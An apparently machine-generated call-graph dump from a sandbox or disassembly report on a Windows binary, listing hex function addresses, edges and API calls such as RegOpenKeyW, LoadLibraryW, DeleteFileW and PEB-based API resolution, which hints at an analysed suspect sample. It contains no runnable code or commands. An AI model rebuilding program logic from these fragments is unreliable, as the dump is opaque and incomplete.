8497 40bf88 8496->8497 8497->8493 8498 403c90 8 API calls 8497->8498 8499 40bfaa 8498->8499 8500 402b7c 2 API calls 8499->8500 8502 40bfc1 8500->8502 8501 40c4f3 8503 403f9e 5 API calls 8501->8503 8504 40c3aa 8502->8504 8645 40a423 8502->8645 8503->8493 8504->8501 8507 4056bf 2 API calls 8504->8507 8510 40c4e3 8504->8510 8505 402bab 2 API calls 8505->8501 8509 40c3d2 8507->8509 8509->8510 8512 4040bb 12 API calls 8509->8512 8510->8505 8511 405f08 4 API calls 8513 40c005 8511->8513 8514 40c3f3 8512->8514 8515 40c021 8513->8515 8648 40a43f 8513->8648 8517 40c4d1 8514->8517 8705 405a52 8514->8705 8516 4031e5 4 API calls 8515->8516 8519 40c034 8516->8519 8522 413aca 4 API calls 8517->8522 8528 4031e5 4 API calls 8519->8528 8523 40c4dd 8522->8523 8526 405695 2 API calls 8523->8526 8524 40c411 8710 405a87 8524->8710 8525 402bab 2 API calls 8525->8515 8526->8510 8534 40c04d 8528->8534 8529 40c4b3 8530 402bab 2 API calls 8529->8530 8532 40c4cb 8530->8532 8531 405a52 4 API calls 8542 40c423 8531->8542 8533 403f9e 5 API calls 8532->8533 8533->8517 8536 4031e5 4 API calls 8534->8536 8535 405a87 4 API calls 8535->8542 8537 40c085 8536->8537 8539 4031e5 4 API calls 8537->8539 8538 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8538->8542 8540 40c09c 8539->8540 8543 4031e5 4 API calls 8540->8543 8541 402bab 2 API calls 8541->8542 8542->8529 8542->8531 8542->8535 8542->8538 8542->8541 8544 40c0b3 8543->8544 8545 4031e5 4 API calls 8544->8545 8546 40c0ca 8545->8546 8547 4031e5 4 API calls 8546->8547 8548 40c0e7 8547->8548 8549 4031e5 4 API calls 8548->8549 8550 40c100 8549->8550 8551 4031e5 4 API calls 8550->8551 8552 40c119 8551->8552 8553 4031e5 4 API calls 8552->8553 8554 40c132 8553->8554 8555 4031e5 4 API calls 8554->8555 8556 40c14b 8555->8556 8557 4031e5 4 API calls 8556->8557 8558 40c164 8557->8558 8559 4031e5 4 API calls 8558->8559 8560 40c17d 8559->8560 8561 4031e5 4 API calls 8560->8561 8562 40c196 8561->8562 8563 4031e5 4 API calls 8562->8563 8564 40c1af 8563->8564 8565 4031e5 4 API calls 8564->8565 8566 40c1c8 8565->8566 8567 4031e5 4 API calls 8566->8567 8568 40c1de 8567->8568 8569 4031e5 4 API calls 8568->8569 8570 40c1f4 8569->8570 8571 4031e5 4 API calls 8570->8571 8572 40c20d 8571->8572 8573 4031e5 4 API calls 8572->8573 8574 40c226 8573->8574 8575 4031e5 4 API calls 8574->8575 8576 40c23f 8575->8576 8577 4031e5 4 API calls 8576->8577 8578 40c258 8577->8578 8579 4031e5 4 API calls 8578->8579 8580 40c273 8579->8580 8581 4031e5 4 API calls 8580->8581 8582 40c28a 8581->8582 8583 4031e5 4 API calls 8582->8583 8586 40c2d5 8583->8586 8584 40c3a2 8585 402bab 2 API calls 8584->8585 8585->8504 8586->8584 8587 4031e5 4 API calls 8586->8587 8588 40c315 8587->8588 8589 40c38b 8588->8589 8651 404866 8588->8651 8590 403c40 5 API calls 8589->8590 8592 40c397 8590->8592 8594 403c40 5 API calls 8592->8594 8594->8584 8595 40c382 8597 403c40 5 API calls 8595->8597 8597->8589 8599 406c4c 6 API calls 8600 40c355 8599->8600 8600->8595 8675 4126a7 8600->8675 8603 4031e5 4 API calls 8602->8603 8604 405f1d 8603->8604 8605 402b7c 2 API calls 8604->8605 8608 405f55 8604->8608 8606 405f36 8605->8606 8607 4031e5 4 API calls 8606->8607 8606->8608 8607->8608 8608->8451 8608->8454 8608->8459 8608->8460 8610 409673 8609->8610 8615 40956d 8609->8615 8610->8469 8611 408b45 6 API calls 8611->8615 8612 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 8612->8615 8613 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8613->8615 8614 402bab GetProcessHeap HeapFree 8614->8615 8615->8610 8615->8611 8615->8612 8615->8613 8615->8614 8617 4040bb 12 API calls 8616->8617 8625 4096a9 8617->8625 8618 40989f 8618->8474 8619 409896 8620 403f9e 5 API calls 8619->8620 8620->8618 8622 408b45 6 API calls 8622->8625 8623 402bab GetProcessHeap HeapFree 8623->8625 8624 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8624->8625 8625->8618 8625->8619 8625->8622 8625->8623 8625->8624 8874 4059d8 8625->8874 8627 4040bb 12 API calls 8626->8627 8634 4098c1 8627->8634 8628 4099fb 8628->8477 8629 4099f3 8630 403f9e 5 API calls 8629->8630 8630->8628 8631 402bab GetProcessHeap HeapFree 8631->8634 8632 4059d8 4 API calls 8632->8634 8633 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 8633->8634 8634->8628 8634->8629 8634->8631 8634->8632 8634->8633 8636 4031e5 4 API calls 8635->8636 8637 406441 GetNativeSystemInfo 8636->8637 8637->8492 8639 4031e5 4 API calls 8638->8639 8640 40480a 8639->8640 8641 4031e5 4 API calls 8640->8641 8643 40485d 8640->8643 8644 40484f 8640->8644 8641->8640 8642 403c40 5 API calls 8642->8643 8643->8493 8643->8496 8644->8642 8646 4031e5 4 API calls 8645->8646 8647 40a435 8646->8647 8647->8511 8649 4031e5 4 API calls 8648->8649 8650 40a451 8649->8650 8650->8525 8652 4031e5 4 API calls 8651->8652 8653 40487c 8652->8653 8653->8595 8654 406c4c 8653->8654 8715 4068eb 8654->8715 8656 406e02 8656->8599 8657 406cab 8727 40469b 8657->8727 8658 406c6c 8658->8656 8658->8657 8724 406894 8658->8724 8665 406df1 8666 40469b 4 API calls 8665->8666 8666->8656 8667 406cef 8667->8665 8668 4031e5 4 API calls 8667->8668 8669 406d26 8668->8669 8669->8665 8670 40771e 6 API calls 8669->8670 8674 406d57 8670->8674 8671 406da2 8672 4031e5 4 API calls 8671->8672 8672->8665 8674->8671 8740 4068b0 8674->8740 8676 4126bb 8675->8676 8679 4126d1 8675->8679 8684 412840 8676->8684 8796 40488c 8676->8796 8679->8684 8802 407055 8679->8802 8681 412837 8683 403c40 5 API calls 8681->8683 8683->8684 8684->8595 8686 41281e 8687 4070ff 6 API calls 8686->8687 8687->8681 8688 407055 6 API calls 8689 412742 8688->8689 8689->8686 8690 40719a 6 API calls 8689->8690 8691 41276e 8690->8691 8692 412804 8691->8692 8818 406f4a 8691->8818 8846 4070ff 8692->8846 8695 41279a 8824 412553 8695->8824 8868 405907 8705->8868 8707 405a61 8708 405a76 8707->8708 8709 405907 4 API calls 8707->8709 8708->8524 8709->8707 8711 402b7c 2 API calls 8710->8711 8712 405a99 8711->8712 8713 405ade 8712->8713 8871 40595e 8712->8871 8713->8542 8743 4076a8 8715->8743 8717 406913 8718 406a61 8717->8718 8719 40771e 6 API calls 8717->8719 8718->8658 8723 406949 8719->8723 8720 40771e 6 API calls 8720->8723 8721 404678 4 API calls 8721->8723 8723->8718 8723->8720 8723->8721 8749 4046c2 8723->8749 8725 4031e5 4 API calls 8724->8725 8726 4068a6 8725->8726 8726->8658 8728 4046b4 8727->8728 8729 4046a4 8727->8729 8728->8656 8731 404678 8728->8731 8730 4031e5 4 API calls 8729->8730 8730->8728 8732 4031e5 4 API calls 8731->8732 8733 40468b 8732->8733 8733->8656 8734 40771e 8733->8734 8735 407737 8734->8735 8738 407748 8734->8738 8736 407644 6 API calls 8735->8736 8737 407741 8736->8737 8739 406baa 6 API calls 8737->8739 8738->8667 8739->8738 8741 4031e5 4 API calls 8740->8741 8742 4068c2 8741->8742 8742->8674 8744 4076c1 8743->8744 8748 4076d2 8743->8748 8757 407644 8744->8757 8748->8717 8750 4046d3 8749->8750 8751 4046d9 8749->8751 8792 40464c 8750->8792 8753 4046e9 8751->8753 8755 404678 4 API calls 8751->8755 8754 404714 8753->8754 8756 40469b 4 API calls 8753->8756 8754->8723 8755->8753 8756->8754 8758 407653 8757->8758 8759 407661 8757->8759 8758->8759 8765 406a6b 8758->8765 8761 406baa 8759->8761 8762 406bbb 8761->8762 8764 406bc8 8761->8764 8762->8764 8773 407402 8762->8773 8764->8748 8766 406a81 8765->8766 8767 402b7c 2 API calls 8766->8767 8768 406b8b 8766->8768 8769 406894 4 API calls 8766->8769 8770 406b96 8766->8770 8772 402bab 2 API calls 8766->8772 8767->8766 8768->8759 8769->8766 8771 402bab 2 API calls 8770->8771 8771->8768 8772->8766 8774 407644 6 API calls 8773->8774 8775 407412 8774->8775 8776 402b7c 2 API calls 8775->8776 8783 407450 8775->8783 8777 407483 8776->8777 8778 402b7c 2 API calls 8777->8778 8777->8783 8780 4074ce 8778->8780 8779 4074da 8781 4068cc 2 API calls 8779->8781 8780->8779 8782 402b7c 2 API calls 8780->8782 8781->8783 8786 40751f 8782->8786 8783->8764 8784 40752b 8785 4068cc 2 API calls 8784->8785 8785->8779 8786->8784 8788 4068cc 8786->8788 8789 4068d6 8788->8789 8790 4068e3 8788->8790 8789->8790 8791 402bab GetProcessHeap HeapFree 8789->8791 8790->8784 8791->8790 8793 404659 8792->8793 8795 404666 8792->8795 8794 4031e5 4 API calls 8793->8794 8794->8795 8795->8751 8797 4047e6 5 API calls 8796->8797 8798 404897 8797->8798 8799 40489c 8798->8799 8854 4047c7 8798->8854 8799->8679 8803 40706f 8802->8803 8804 407084 8802->8804 8803->8804 8805 407644 6 API calls 8803->8805 8809 4070e4 8804->8809 8857 406fd2 8804->8857 8806 40707d 8805->8806 8808 406baa 6 API calls 8806->8808 8808->8804 8809->8681 8810 40719a 8809->8810 8811 4071b0 8810->8811 8813 4071c5 8810->8813 8812 407644 6 API calls 8811->8812 8811->8813 8814 4071be 8812->8814 8816 406fd2 4 API calls 8813->8816 8817 407226 8813->8817 8815 406baa 6 API calls 8814->8815 8815->8813 8816->8817 8817->8686 8817->8688 8819 406f64 8818->8819 8823 406f75 8818->8823 8820 407644 6 API calls 8819->8820 8821 406f6e 8820->8821 8822 406baa 6 API calls 8821->8822 8822->8823 8823->8695 8865 4060ac 8824->8865 8847 407116 8846->8847 8849 40712b 8846->8849 8848 407644 6 API calls 8847->8848 8847->8849 8850 407124 8848->8850 8851 406fd2 4 API calls 8849->8851 8853 407187 8849->8853 8852 406baa 6 API calls 8850->8852 8851->8853 8852->8849 8853->8686 8855 4031e5 4 API calls 8854->8855 8856 4047d9 8855->8856 8856->8679 8858 406fde 8857->8858 8859 407027 8858->8859 8860 4031e5 4 API calls 8858->8860 8859->8809 8861 406ffa 8860->8861 8862 4031e5 4 API calls 8861->8862 8863 407011 8862->8863 8864 4031e5 4 API calls 8863->8864 8864->8859 8866 4031e5 4 API calls 8865->8866 8867 4060bb 8866->8867 8867->8867 8869 4031e5 4 API calls 8868->8869 8870 40591a 8869->8870 8870->8707 8872 4031e5 4 API calls 8871->8872 8873 405971 8872->8873 8873->8712 8875 4031e5 4 API calls 8874->8875 8876 4059ed 8875->8876 8877 402b7c 2 API calls 8876->8877 8878 405a38 8876->8878 8879 405a16 8877->8879 8878->8625 8879->8878 8880 4031e5 4 API calls 8879->8880 8880->8878 8882 4031e5 4 API calls 8881->8882 8883 4044b9 8882->8883 8883->8482 9893 40a349 9894 4098a7 13 API calls 9893->9894 9895 40a359 9894->9895 9042 408952 9063 40823f 9042->9063 9045 408960 9047 4056bf 2 API calls 9045->9047 9048 40896a 9047->9048 9091 408862 9048->9091 9050 413aca 4 API calls 9051 4089d4 9050->9051 9053 405695 2 API calls 9051->9053 9052 408975 9060 4089c4 9052->9060 9099 4087d6 9052->9099 9055 4089df 9053->9055 9060->9050 9061 402bab 2 API calls 9062 40899d 9061->9062 9062->9060 9062->9061 9064 40824d 9063->9064 9065 40831b 9064->9065 9066 4031e5 4 API calls 9064->9066 9065->9045 9079 4083bb 9065->9079 9067 40826d 9066->9067 9068 4031e5 4 API calls 9067->9068 9069 408289 9068->9069 9070 4031e5 4 API calls 9069->9070 9071 4082a5 9070->9071 9072 4031e5 4 API calls 9071->9072 9073 4082c1 9072->9073 9074 4031e5 4 API calls 9073->9074 9075 4082e2 9074->9075 9076 4031e5 4 API calls 9075->9076 9077 4082ff 9076->9077 9078 4031e5 4 API calls 9077->9078 9078->9065 9127 408363 9079->9127 9082 4084ab 9082->9045 9083 4056bf 2 API calls 9084 4083f4 9083->9084 9085 408492 9084->9085 9130 40815d 9084->9130 9145 40805d 9084->9145 9086 413aca 4 API calls 9085->9086 9087 4084a0 9086->9087 9088 405695 2 API calls 9087->9088 9088->9082 9160 404b8f 9091->9160 9093 408946 9093->9052 9094 40887e 9094->9093 9095 4031e5 4 API calls 9094->9095 9096 40893e 9094->9096 9098 402b7c 2 API calls 9094->9098 9095->9094 9163 404a39 9096->9163 9098->9094 9100 402b7c 2 API calls 9099->9100 9101 4087e7 9100->9101 9102 4031e5 4 API calls 9101->9102 9106 40885a 9101->9106 9103 408802 9102->9103 9107 40884d 9103->9107 9110 408853 9103->9110 9172 408522 9103->9172 9176 4084b4 9103->9176 9104 402bab 2 API calls 9104->9106 9111 408749 9106->9111 9179 4084d4 9107->9179 9110->9104 9112 404b8f 5 API calls 9111->9112 9113 408765 9112->9113 9114 4031e5 4 API calls 9113->9114 9115 408522 4 API calls 9113->9115 9116 4087c7 9113->9116 9118 4087cf 9113->9118 9114->9113 9115->9113 9117 404a39 5 API calls 9116->9117 9117->9118 9119 4085d1 9118->9119 9120 4086c2 9119->9120 9123 4085e9 9119->9123 9120->9062 9122 402bab 2 API calls 9122->9123 9123->9120 9123->9122 9124 4031e5 4 API calls 9123->9124 9185 4089e6 9123->9185 9204 4086c9 9123->9204 9208 4036a3 9123->9208 9124->9123 9128 4031e5 4 API calls 9127->9128 9129 408386 9128->9129 9129->9082 9129->9083 9131 40816f 9130->9131 9132 4081b6 9131->9132 9133 4081fd 9131->9133 9144 4081ef 9131->9144 9135 405872 4 API calls 9132->9135 9134 405872 4 API calls 9133->9134 9136 408213 9134->9136 9137 4081cf 9135->9137 9138 405872 4 API calls 9136->9138 9139 405872 4 API calls 9137->9139 9140 408222 9138->9140 9141 4081df 9139->9141 9142 405872 4 API calls 9140->9142 9143 405872 4 API calls 9141->9143 9142->9144 9143->9144 9144->9084 9146 40808c 9145->9146 9147 4080d2 9146->9147 9148 408119 9146->9148 9159 40810b 9146->9159 9150 405872 4 API calls 9147->9150 9149 405872 4 API calls 9148->9149 9151 40812f 9149->9151 9152 4080eb 9150->9152 9154 405872 4 API calls 9151->9154 9153 405872 4 API calls 9152->9153 9155 4080fb 9153->9155 9156 40813e 9154->9156 9157 405872 4 API calls 9155->9157 9158 405872 4 API calls 9156->9158 9157->9159 9158->9159 9159->9084 9166 404a19 9160->9166 9162 404ba0 9162->9094 9169 4049ff 9163->9169 9165 404a44 9165->9093 9167 4031e5 4 API calls 9166->9167 9168 404a2c RegOpenKeyW 9167->9168 9168->9162 9170 4031e5 4 API calls 9169->9170 9171 404a12 RegCloseKey 9170->9171 9171->9165 9174 408534 9172->9174 9173 4085af 9173->9103 9174->9173 9182 4084ee 9174->9182 9177 4031e5 4 API calls 9176->9177 9178 4084c7 9177->9178 9178->9103 9180 4031e5 4 API calls 9179->9180 9181 4084e7 9180->9181 9181->9110 9183 4031e5 4 API calls 9182->9183 9184 408501 9183->9184 9184->9173 9186 4031e5 4 API calls 9185->9186 9187 408a06 9186->9187 9188 408b21 9187->9188 9189 4031e5 4 API calls 9187->9189 9188->9123 9192 408a32 9189->9192 9190 408b17 9220 403649 9190->9220 9192->9190 9211 403666 9192->9211 9195 4031e5 4 API calls 9197 408a88 9195->9197 9198 4031e5 4 API calls 9197->9198 9203 408b0e 9197->9203 9199 408ac4 9198->9199 9200 405b6f 6 API calls 9199->9200 9201 408aff 9200->9201 9201->9203 9214 408508 9201->9214 9217 40362f 9203->9217 9205 4086e2 9204->9205 9206 408744 9204->9206 9205->9206 9207 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree 9205->9207 9206->9123 9207->9205 9209 4031e5 4 API calls 9208->9209 9210 4036b5 9209->9210 9210->9123 9212 4031e5 4 API calls 9211->9212 9213 403679 9212->9213 9213->9195 9213->9203 9215 4031e5 4 API calls 9214->9215 9216 40851b 9215->9216 9216->9203 9218 4031e5 4 API calls 9217->9218 9219 403642 9218->9219 9219->9190 9221 4031e5 4 API calls 9220->9221 9222 40365c 9221->9222 9222->9188 10054 41045c 10055 4040bb 12 API calls 10054->10055 10056 410477 10055->10056 10057 41060b 10056->10057 10085 407851 10056->10085 10059 41048f 10061 407851 2 API calls 10059->10061 10065 410604 10059->10065 10060 403f9e 5 API calls 10060->10057 10062 4104a9 10061->10062 10067 4105e0 10062->10067 10068 405ae9 6 API calls 10062->10068 10070 41056f 10062->10070 10071 4105eb 10062->10071 10063 402bab 2 API calls 10063->10065 10064 402bab 2 API calls 10066 4105fb 10064->10066 10065->10060 10066->10063 10069 402bab 2 API calls 10067->10069 10067->10071 10068->10062 10069->10071 10070->10067 10072 4105d6 10070->10072 10074 412269 6 API calls 10070->10074 10071->10064 10071->10066 10073 402bab 2 API calls 10072->10073 10073->10067 10075 410580 10074->10075 10075->10072 10076 405872 4 API calls 10075->10076 10077 410599 10076->10077 10078 405872 4 API calls 10077->10078 10079 4105a9 10078->10079 10080 405872 4 API calls 10079->10080 10081 4105bb 10080->10081 10082 405872 4 API calls 10081->10082 10083 4105cd 10082->10083 10084 402bab 2 API calls 10083->10084 10084->10072 10086 407866 10085->10086 10087 402b7c 2 API calls 10086->10087 10088 407899 10086->10088 10087->10088 10088->10059 9284 40f561 9287 40f4b6 9284->9287 9288 413b28 6 API calls 9287->9288 9289 40f4bf 9288->9289 9290 405b6f 6 API calls 9289->9290 9291 40f559 9289->9291 9292 413a58 13 API calls 9289->9292 9293 402bab GetProcessHeap HeapFree 9289->9293 9290->9289 9292->9289 9293->9289 9297 403b64 9298 4031e5 4 API calls 9297->9298 9299 403b77 PathFileExistsW 9298->9299 10193 40d069 10194 404bee 6 API calls 10193->10194 10195 40d080 10194->10195 10196 404bee 6 API calls 10195->10196 10218 40d1e2 10195->10218 10197 40d099 10196->10197 10198 404bee 6 API calls 10197->10198 10199 40d0a7 10198->10199 10200 404ba7 4 API calls 10199->10200 10201 40d0b6 10200->10201 10202 404bee 6 API calls 10201->10202 10203 40d0c5 10202->10203 10204 404c4e 6 API calls 10203->10204 10205 40d0dc 10204->10205 10206 404bee 6 API calls 10205->10206 10207 40d0eb 10206->10207 10208 404ba7 4 API calls 10207->10208 10209 40d0fa 10208->10209 10210 404bee 6 API calls 10209->10210 10211 40d109 10210->10211 10212 404c4e 6 API calls 10211->10212 10213 40d123 10212->10213 10214 405872 4 API calls 10213->10214 10213->10218 10215 40d14a 10214->10215 10216 405872 4 API calls 10215->10216 10217 40d159 10216->10217 10219 405872 4 API calls 10217->10219 10220 40d16b 10219->10220 10221 405781 4 API calls 10220->10221 10222 40d179 10221->10222 10223 405872 4 API calls 10222->10223 10224 40d18b 10223->10224 10225 405762 4 API calls 10224->10225 10226 40d19f 10225->10226 10227 405872 4 API calls 10226->10227 10228 40d1b1 10227->10228 10229 405781 4 API calls 10228->10229 10230 40d1bf 10229->10230 10231 405872 4 API calls 10230->10231 10232 40d1d1 10231->10232 10233 405762 4 API calls 10232->10233 10233->10218 9326 40f16e 9327 4056bf 2 API calls 9326->9327 9328 40f17b 9327->9328 9329 412093 20 API calls 9328->9329 9330 40f19e 9329->9330 9331 412093 20 API calls 9330->9331 9332 40f1b6 9331->9332 9333 412093 20 API calls 9332->9333 9334 40f1cc 9333->9334 9335 412093 20 API calls 9334->9335 9336 40f1e2 9335->9336 9337 413aca 4 API calls 9336->9337 9338 40f1ef 9337->9338 9339 405695 2 API calls 9338->9339 9340 40f1fa 9339->9340 9341 40ce71 9342 413b28 6 API calls 9341->9342 9343 40ce78 9342->9343 9344 405b6f 6 API calls 9343->9344 9346 40ce83 9344->9346 9345 403fbf 7 API calls 9347 40cecc 9345->9347 9349 403d74 19 API calls 9346->9349 9353 40cec1 9346->9353 9359 40ceba 9346->9359 9348 403d74 19 API calls 9347->9348 9358 40cefb 9347->9358 9351 40cee7 9348->9351 9352 40cead 9349->9352 9350 402bab 2 API calls 9350->9353 9354 40cef4 9351->9354 9355 402bab 2 API calls 9351->9355 9357 402bab 2 API calls 9352->9357 9352->9359 9353->9345 9356 402bab 2 API calls 9354->9356 9355->9354 9356->9358 9357->9359 9359->9350 9360 406472 9361 4031e5 4 API calls 9360->9361 9362 406484 Sleep 9361->9362 9769 40f204 9770 405781 4 API calls 9769->9770 9771 40f214 9770->9771 9772 4057df 13 API calls 9771->9772 9773 40f226 9772->9773 9420 403c08 9421 4031e5 4 API calls 9420->9421 9422 403c1a DeleteFileW 9421->9422 9423 410a09 9424 41219c 14 API calls 9423->9424 9425 410a1b 9424->9425 9426 41219c 14 API calls 9425->9426 9427 410a23 9426->9427 9428 41219c 14 API calls 9427->9428 9429 410a2c 9428->9429 9430 41219c 14 API calls 9429->9430 9431 410a38 9430->9431 9432 404b22 6 API calls 9431->9432 9433 410a4c 9432->9433 9434 403fbf 7 API calls 9433->9434 9439 410a7a 9433->9439 9435 410a5c 9434->9435 9436 413a58 13 API calls 9435->9436 9441 410a71 9435->9441 9438 410a6b 9436->9438 9437 402bab 2 API calls 9437->9439 9440 402bab 2 API calls 9438->9440 9440->9441 9441->9437 9835 410d09 9836 410d56 9835->9836 9837 410d17 9835->9837 9838 413a58 13 API calls 9836->9838 9851 406642 9837->9851 9841 410d6f 9838->9841 9842 4056bf 2 API calls 9843 410d2e 9842->9843 9864 405641 9843->9864 9845 410d41 9846 413aca 4 API calls 9845->9846 9847 410d4a 9846->9847 9848 405695 2 API calls 9847->9848 9849 410d50 9848->9849 9850 4036a3 4 API calls 9849->9850 9850->9836 9852 406662 9851->9852 9853 4031e5 4 API calls 9852->9853 9854 406676 9853->9854 9868 4066bf 9854->9868 9859 4066b1 9862 4036a3 4 API calls 9859->9862 9860 4066a7 9861 4036a3 4 API calls 9860->9861 9863 4066ac 9861->9863 9862->9863 9863->9836 9863->9842 9865 40564d 9864->9865 9867 405673 9864->9867 9866 4056fc 4 API calls 9865->9866 9865->9867 9866->9867 9867->9845 9869 4031e5 4 API calls 9868->9869 9870 4066dc 9869->9870 9871 4066f6 SetLastError 9870->9871 9872 406708 GetLastError 9870->9872 9873 406693 9871->9873 9872->9873 9874 406713 9872->9874 9890 406455 9873->9890 9875 4031e5 4 API calls 9874->9875 9876 406725 9875->9876 9876->9873 9877 4031e5 4 API calls 9876->9877 9878 40673f 9877->9878 9879 406753 9878->9879 9880 406749 9878->9880 9882 4031e5 4 API calls 9879->9882 9881 4036a3 4 API calls 9880->9881 9881->9873 9883 406761 9882->9883 9884 40678a 9883->9884 9885 40677c 9883->9885 9887 4036a3 4 API calls 9884->9887 9886 4036a3 4 API calls 9885->9886 9888 406781 9886->9888 9887->9873 9889 4036a3 4 API calls 9888->9889 9889->9873 9891 4031e5 4 API calls 9890->9891 9892 406468 9891->9892 9892->9859 9892->9860 9442 40c509 9443 412093 20 API calls 9442->9443 9444 40c51e 9443->9444 9451 40910d 9452 404b22 6 API calls 9451->9452 9453 409124 9452->9453 9454 40917a 9453->9454 9455 405b6f 6 API calls 9453->9455 9456 40913e 9455->9456 9457 409173 9456->9457 9458 404b22 6 API calls 9456->9458 9459 402bab 2 API calls 9457->9459 9460 409153 9458->9460 9459->9454 9461 409408 15 API calls 9460->9461 9465 40916a 9460->9465 9463 409164 9461->9463 9462 402bab 2 API calls 9462->9457 9464 402bab 2 API calls 9463->9464 9464->9465 9465->9462 9469 410410 9470 4056bf 2 API calls 9469->9470 9471 41041b 9470->9471 9472 412093 20 API calls 9471->9472 9473 41043c 9472->9473 9474 413aca 4 API calls 9473->9474 9475 410449 9474->9475 9476 405695 2 API calls 9475->9476 9477 410454 9476->9477 9504 40c71a 9505 41219c 14 API calls 9504->9505 9506 40c728 9505->9506 9985 410b1a 9986 404bee 6 API calls 9985->9986 9987 410b31 9986->9987 9988 404bee 6 API calls 9987->9988 9998 410c6d 9987->9998 9989 410b5a 9988->9989 9990 404bee 6 API calls 9989->9990 9991 410b69 9990->9991 9992 404bee 6 API calls 9991->9992 9993 410b78 9992->9993 9994 404ba7 4 API calls 9993->9994 9995 410b86 9994->9995 9996 404ba7 4 API calls 9995->9996 9997 410b95 9996->9997 9997->9998 9999 405872 4 API calls 9997->9999 10000 410bd7 9999->10000 10001 405872 4 API calls 10000->10001 10002 410be8 10001->10002 10003 405872 4 API calls 10002->10003 10004 410bf9 10003->10004 10005 405781 4 API calls 10004->10005 10006 410c07 10005->10006 10007 405781 4 API calls 10006->10007 10011 410c15 10007->10011 10008 410c4e 10009 405762 4 API calls 10008->10009 10010 410c60 10009->10010 10010->9998 10013 403f9e 5 API calls 10010->10013 10011->10008 10018 405e5a 10011->10018 10013->9998 10015 4040bb 12 API calls 10016 410c44 10015->10016 10017 402bab 2 API calls 10016->10017 10017->10008 10019 402b7c 2 API calls 10018->10019 10020 405e72 10019->10020 10021 4031e5 4 API calls 10020->10021 10023 405ea3 10020->10023 10022 405e94 10021->10022 10022->10023 10024 402bab 2 API calls 10022->10024 10023->10008 10023->10015 10024->10023 10025 40f81c 10026 404bee 6 API calls 10025->10026 10028 40f833 10026->10028 10027 40f94f 10028->10027 10029 404bee 6 API calls 10028->10029 10030 40f85c 10029->10030 10031 404bee 6 API calls 10030->10031 10032 40f86b 10031->10032 10033 404bee 6 API calls 10032->10033 10034 40f87a 10033->10034 10035 404bee 6 API calls 10034->10035 10036 40f888 10035->10036 10037 404ba7 4 API calls 10036->10037 10038 40f897 10037->10038 10038->10027 10039 405872 4 API calls 10038->10039 10040 40f8d8 10039->10040 10041 405872 4 API calls 10040->10041 10042 40f8ea 10041->10042 10043 405872 4 API calls 10042->10043 10044 40f8fa 10043->10044 10045 405872 4 API calls 10044->10045 10046 40f90c 10045->10046 10047 405781 4 API calls 10046->10047 10048 40f91d 10047->10048 10049 4040bb 12 API calls 10048->10049 10050 40f92d 10049->10050 10051 405762 4 API calls 10050->10051 10052 40f93f 10051->10052 10052->10027 10053 403f9e 5 API calls 10052->10053 10053->10027 9519 402c1f 9520 4031e5 4 API calls 9519->9520 9521 402c31 LoadLibraryW 9520->9521 10121 407e1f 10122 407e2c 10121->10122 10124 407e61 10121->10124 10125 402bab 2 API calls 10122->10125 10126 407e3e 10122->10126 10130 407e51 10122->10130 10123 407ed4 10128 407eb6 10124->10128 10132 405872 4 API calls 10124->10132 10138 407ea6 10124->10138 10125->10126 10126->10123 10131 402bab 2 API calls 10126->10131 10127 402bab 2 API calls 10127->10128 10129 402bab 2 API calls 10128->10129 10128->10130 10129->10130 10130->10123 10133 402bab 2 API calls 10130->10133 10131->10130 10134 407e86 10132->10134 10133->10123 10135 405872 4 API calls 10134->10135 10136 407e96 10135->10136 10137 405872 4 API calls 10136->10137 10137->10138 10138->10127 10138->10128 9534 405924 9535 4031e5 4 API calls 9534->9535 9536 405937 StrStrW 9535->9536 10147 410927 10148 4044ee 7 API calls 10147->10148 10149 41093d 10148->10149 10150 4109a4 10149->10150 10151 4056bf 2 API calls 10149->10151 10154 410954 10151->10154 10152 4044ee 7 API calls 10152->10154 10154->10152 10155 402bab 2 API calls 10154->10155 10156 410990 10154->10156 10162 41080e 10154->10162 10155->10154 10157 413aca 4 API calls 10156->10157 10158 410998 10157->10158 10159 405695 2 API calls 10158->10159 10160 41099e 10159->10160 10161 402bab 2 API calls 10160->10161 10161->10150 10163 410821 10162->10163 10173 41091f 10163->10173 10174 410701 10163->10174 10166 405872 4 API calls 10167 410900 10166->10167 10168 405872 4 API calls 10167->10168 10169 41090d 10168->10169 10170 405872 4 API calls 10169->10170 10171 410919 10170->10171 10172 402bab 2 API calls 10171->10172 10172->10173 10173->10154 10175 405f08 4 API calls 10174->10175 10177 410713 10175->10177 10176 410804 10176->10166 10176->10173 10177->10176 10178 402b7c 2 API calls 10177->10178 10182 410748 10178->10182 10179 4107fd 10180 402bab 2 API calls 10179->10180 10180->10176 10181 402b7c 2 API calls 10184 4107ad 10181->10184 10182->10179 10182->10181 10183 402bab 2 API calls 10183->10179 10184->10183 9592 40f12f 9593 41219c 14 API calls 9592->9593 9594 40f13f 9593->9594 9595 41219c 14 API calls 9594->9595 9596 40f14c 9595->9596 9597 41219c 14 API calls 9596->9597 9598 40f159 9597->9598 9599 41219c 14 API calls 9598->9599 9600 40f166 9599->9600 9607 40ed35 9608 4056bf 2 API calls 9607->9608 9609 40ed42 9608->9609 9610 412093 20 API calls 9609->9610 9611 40ed63 9610->9611 9612 412093 20 API calls 9611->9612 9613 40ed73 9612->9613 9614 413aca 4 API calls 9613->9614 9615 40ed80 9614->9615 9616 405695 2 API calls 9615->9616 9617 40ed8e 9616->9617 8061 40f3c5 8066 41219c 8061->8066 8064 41219c 14 API calls 8065 40f3e1 8064->8065 8067 4121b1 8066->8067 8083 40f3d3 8066->8083 8068 4121be 8067->8068 8072 4121c5 8067->8072 8114 413ba4 8068->8114 8070 4121ca 8084 404056 8070->8084 8072->8070 8076 412210 8072->8076 8073 4121c3 8073->8083 8091 405b6f 8073->8091 8076->8083 8119 403fbf 8076->8119 8077 41224d 8080 402bab 2 API calls 8077->8080 8077->8083 8080->8083 8083->8064 8130 402b7c GetProcessHeap RtlAllocateHeap 8084->8130 8086 404066 8088 404095 8086->8088 8132 4031e5 8086->8132 8088->8073 8090 402bab 2 API calls 8090->8088 8092 405b7d 8091->8092 8093 402b7c 2 API calls 8092->8093 8094 405b99 8093->8094 8100 405c02 8094->8100 8168 4059b8 8094->8168 8096 405c09 8098 402bab 2 API calls 8096->8098 8097 405bba 